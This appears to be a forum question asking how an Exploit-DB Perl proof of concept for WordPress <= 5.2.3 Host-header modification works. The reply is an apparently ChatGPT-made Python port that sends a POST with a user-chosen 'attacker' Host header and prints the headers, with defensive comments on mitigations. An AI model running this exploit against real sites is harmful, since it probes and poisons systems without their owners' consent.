Exploit in Perl. This is the exploit on Exploit-DB for cross-site host modification, written in Perl. Can anyone please tell me what it is doing and how it does it? Basically, I want the code in Python so that I can understand from the code how we bypass the WSF. Can someone please explain how this is exploited, or give me this code in Python so I can try to reverse-engineer it?
I was very lazy and let ChatGPT do it:
import requests
import random
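def rand_ua(category):
    """Return one User-Agent string chosen at random from the named category.

    Args:
        category: Key into the table below; only "browsers" is defined.

    Returns:
        A User-Agent header value picked with random.choice.

    Raises:
        KeyError: If category is not a key of the table.
    """
    user_agents = {
        "browsers": [
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
            "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
            "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1",
        ],
    }
    # The value is only cosmetic request metadata, so the non-cryptographic
    # `random` module is adequate here.
    return random.choice(user_agents[category])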
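# What this script does: it sends ONE POST request to the URL entered first,
# with the HTTP Host header replaced by the second value, then prints the
# request and response headers so the reader can see how the server answered.
#
# Why that matters to a defender: the URL decides which machine receives the
# request, while the Host header is free text chosen by the client. An
# application that builds absolute URLs (redirects, links in e-mails, cached
# pages) from the Host header instead of from its own configuration will emit
# whatever name the client supplied. The banner below attributes this
# behaviour to WordPress <= 5.2.3; nothing in this script verifies the
# version, it only shows the headers.
#
# Mitigations to check on the server side:
#   * the web server should answer only for its configured host names and
#     send everything else to a default virtual host that rejects it;
#   * the application should take its public address from configuration
#     (for WordPress: WP_HOME / WP_SITEURL in wp-config.php), not from Host;
#   * access logs should record the Host header so mismatches are visible.
host = input("Enter the host URL: ")
# NOTE(review): the prompt says "URL", but the value is placed verbatim into
# the Host header, which carries a host name (optionally with a port).
attacker = input("Enter the attacker URL: ")

if not host.startswith("http"):
    print("# e.g. python3 script.py https://target:port/ default-vhost.com")
    # SystemExit instead of the interactive helper exit(), which is only
    # present when the `site` module has been loaded.
    raise SystemExit

print("# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit")
print("# ====================================================================================")
print("# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>")

headers = {
    "User-Agent": rand_ua("browsers"),
    "Content-Type": "application/x-www-form-urlencoded",
    "Host": attacker,
}
# A timeout keeps the script from hanging forever on an unresponsive server.
response = requests.post(host, headers=headers, data=" ", timeout=30)

if response.status_code == 401:
    print("# 401 Unauthorized!")
    raise SystemExit

# The original printed a generator object (and referenced an undefined name
# `request`); iterate explicitly so each header appears on its own line.
# response.request is the request object that produced this response.
for key, value in response.request.headers.items():
    print("# > {} => {}".format(key, value))
for key, value in response.headers.items():
    print("# < {} => {}".format(key, value))
print("# ====================================================================================")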